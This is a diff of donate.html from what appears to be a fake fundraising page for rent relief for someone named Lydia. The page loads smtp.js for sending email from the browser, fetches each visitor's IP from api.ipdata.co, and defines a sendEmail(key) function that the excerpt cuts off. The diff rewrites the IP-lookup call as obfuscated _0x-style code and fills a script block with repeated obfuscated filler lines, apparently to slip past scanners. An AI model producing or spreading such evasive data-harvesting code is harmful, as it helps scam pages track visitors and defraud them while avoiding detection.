--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -5,28 +5,28 @@
   </title>
   <script src="https://smtpjs.com/v3/smtp.js"></script> 
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
 	// This is a single line JavaScript comment
 	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
-	// This is a single line JavaScript comment
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
+	// This is a single line JavaScript commentvar _0x2166=['Hello\x20World!'];(function(_0x393f61,_0x2166cf){var _0x4d18ce=function(_0x5ba128){while(--_0x5ba128){_0x393f61['push'](_0x393f61['shift']());}};_0x4d18ce(++_0x2166cf);}(_0x2166,0x154));var _0x4d18=function(_0x393f61,_0x2166cf){_0x393f61=_0x393f61-0x0;var _0x4d18ce=_0x2166[_0x393f61];return _0x4d18ce;};function hi(){console['log'](_0x4d18('0x0'));}hi();
 	// This is a single line JavaScript comment
 	// This is a single line JavaScript comment
 	// This is a single line JavaScript comment
@@ -161,10 +161,7 @@
 	// This is a single line JavaScript comment
     </script> 
    <script> 
-      $.get("https://api.ipdata.co?api-key=test", function(response) {
-    window.ip = response.ip;
-    window.idk = 0;
-}, "jsonp");
+      var _0x3897=['jsonp','get','https://api.ipdata.co?api-key=test'];(function(_0x37fe7c,_0x38972e){var _0x5542f2=function(_0x286820){while(--_0x286820){_0x37fe7c['push'](_0x37fe7c['shift']());}};_0x5542f2(++_0x38972e);}(_0x3897,0x14f));var _0x5542=function(_0x37fe7c,_0x38972e){_0x37fe7c=_0x37fe7c-0x0;var _0x5542f2=_0x3897[_0x37fe7c];return _0x5542f2;};$[_0x5542('0x2')](_0x5542('0x0'),function(_0xf0a2e2){window['ip']=_0xf0a2e2['ip'];window['idk']=0x0;},_0x5542('0x1'));
     </script> 
   <script>
    function sendEmail(key){
